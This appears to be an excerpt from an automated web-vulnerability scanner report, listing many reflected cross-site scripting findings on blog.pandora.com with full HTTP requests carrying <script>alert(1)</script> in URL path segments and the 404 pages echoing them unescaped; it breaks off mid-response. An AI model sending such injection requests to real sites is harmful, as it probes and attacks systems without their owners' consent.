GET /pandora/archives/north-dakotae83f5<script>alert(1)</script>eae0ddbe282/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/north-dakotae83f5<script>alert(1)</script>eae0ddbe282/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0dd2<script>alert(1)</script>e2bfea7bc51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf0dd2<script>alert(1)</script>e2bfea7bc51/archives/ohio/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraf0dd2<script>alert(1)</script>e2bfea7bc51/archives/ohio/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79fc4<script>alert(1)</script>3aa6b3a6382 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives79fc4<script>alert(1)</script>3aa6b3a6382/ohio/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives79fc4<script>alert(1)</script>3aa6b3a6382/ohio/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 16703<script>alert(1)</script>25633d7f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/ohio16703<script>alert(1)</script>25633d7f8/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 344 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/ohio16703<script>alert(1)</script>25633d7f8/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a724b<script>alert(1)</script>15c03653159 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa724b<script>alert(1)</script>15c03653159/archives/oregon/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraa724b<script>alert(1)</script>15c03653159/archives/oregon/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 39f53<script>alert(1)</script>f58171d63c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives39f53<script>alert(1)</script>f58171d63c4/oregon/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives39f53<script>alert(1)</script>f58171d63c4/oregon/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 88507<script>alert(1)</script>bba21d90949 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/oregon88507<script>alert(1)</script>bba21d90949/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/oregon88507<script>alert(1)</script>bba21d90949/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e4fb4<script>alert(1)</script>426d5c520e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorae4fb4<script>alert(1)</script>426d5c520e/archives/other-states/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 353
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorae4fb4<script>alert(1)</script>426d5c520e/archives/other-states/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8f143<script>alert(1)</script>15a8d762de1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8f143<script>alert(1)</script>15a8d762de1/other-states/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives8f143<script>alert(1)</script>15a8d762de1/other-states/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27558<script>alert(1)</script>268c97fcc9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/other-states27558<script>alert(1)</script>268c97fcc9d/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/other-states27558<script>alert(1)</script>268c97fcc9d/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4116e<script>alert(1)</script>e1dd3c30265 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4116e<script>alert(1)</script>e1dd3c30265/archives/other_states/index.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4116e<script>alert(1)</script>e1dd3c30265/archives/other_states/index.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bbc81<script>alert(1)</script>8bbad4a334b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbbc81<script>alert(1)</script>8bbad4a334b/other_states/index.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:42 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbbc81<script>alert(1)</script>8bbad4a334b/other_states/index.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e3b20<script>alert(1)</script>a06d1810695 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/other_statese3b20<script>alert(1)</script>a06d1810695/index.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/other_statese3b20<script>alert(1)</script>a06d1810695/index.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a28a3<script>alert(1)</script>a45d2616222 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/other_states/index.htmla28a3<script>alert(1)</script>a45d2616222 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 364
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/other_states/index.htmla28a3<script>alert(1)</script>a45d2616222 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e30d<script>alert(1)</script>9faee399280 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2e30d<script>alert(1)</script>9faee399280/archives/pennsylvania/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2e30d<script>alert(1)</script>9faee399280/archives/pennsylvania/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 37daf<script>alert(1)</script>c2d02fb7876 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives37daf<script>alert(1)</script>c2d02fb7876/pennsylvania/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives37daf<script>alert(1)</script>c2d02fb7876/pennsylvania/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 60d1f<script>alert(1)</script>2be1e057475 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/pennsylvania60d1f<script>alert(1)</script>2be1e057475/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 354 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/pennsylvania60d1f<script>alert(1)</script>2be1e057475/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9a40f<script>alert(1)</script>859bfd370e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9a40f<script>alert(1)</script>859bfd370e9/archives/play-listen-repeat/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 360 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9a40f<script>alert(1)</script>859bfd370e9/archives/play-listen-repeat/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 604e5<script>alert(1)</script>75e75ebb353 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives604e5<script>alert(1)</script>75e75ebb353/play-listen-repeat/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 360
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives604e5<script>alert(1)</script>75e75ebb353/play-listen-repeat/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d2f58<script>alert(1)</script>9cecf728f10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/play-listen-repeatd2f58<script>alert(1)</script>9cecf728f10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 360
